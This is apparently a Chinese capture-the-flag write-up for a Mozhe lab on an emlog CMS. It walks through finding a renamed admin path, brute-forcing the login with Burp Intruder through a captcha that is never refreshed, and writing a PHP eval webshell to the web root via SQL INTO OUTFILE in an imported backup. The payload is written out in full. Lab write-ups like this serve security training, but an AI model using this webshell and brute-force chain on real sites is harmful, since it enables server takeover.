墨者 - CMS系统漏洞分析溯源(第6题)

打开环境，根据题目提示

上网搜索emlog博客的后台地址，一般为/admin

但是访问失败，应该是改过路径了

用御剑扫描后台（坑点），只扫出以下地址

分别访问这些地址都没有后台的，后来看别人的解题思路才发现

别人一扫就出来了（换了很多个版本，珍藏版，目录优化版，加强字典版.....均扫不出，一把泪）

这里参考https://blog.csdn.net/weixin_43884770/article/details/85103962

地址是/servlets/

后来直接搜索emlog后台登录漏洞

参考链接：https://blog.csdn.net/Fly_hps/article/details/80580771?utm_source=blogxgwz4

emlog后台登录存在登录漏洞，验证码只要登录一次，

就被记录了，没刷新销毁，导致可以用bp直接暴力破解

还发发现用户mozhe777，和墨者666用户

猜测mozhe777是管理员用户

发送到intruder模块暴力破解，字典这里我用弱口令1500

暴力破解失败请求的居多，观察返回的数据长度length，大部分为2099，只有一个是459

登录成功

要getshell，一般都要找到可以上传文件的地方，然后上传一句话木马

找到数据备份到本地，在txt文末添加如下代码

drop table if exists emlog_shell;
create table emlog_shell(`cmd` longtext not null);
insert into emlog_shell values("<?php @eval($_POST['c']);?>");
select cmd from emlog_shell into outfile '/var/www/html/a.php';
drop table if exists emlog_shell;

解释下这句话意思：如果存在emlog_shell呢就把他删了。然后重新创建一张表emlog_shell，而且只有字段cmd，

longtext类型且不为空，并且插入字段值<?php @eval($_POST['c']);?>，构成一句话木马。

然后将cmd的值读出来outfile文件输出流输出到/var/www/html/a.php，然后把emlog_shell删了

导入，然后就是菜刀无惧链接

 

链接成功 

标签：shell,暴力破解,登录,cmd,emlog,系统漏洞,后台,CMS,墨者
来源： https://blog.csdn.net/qq_39936434/article/details/96849467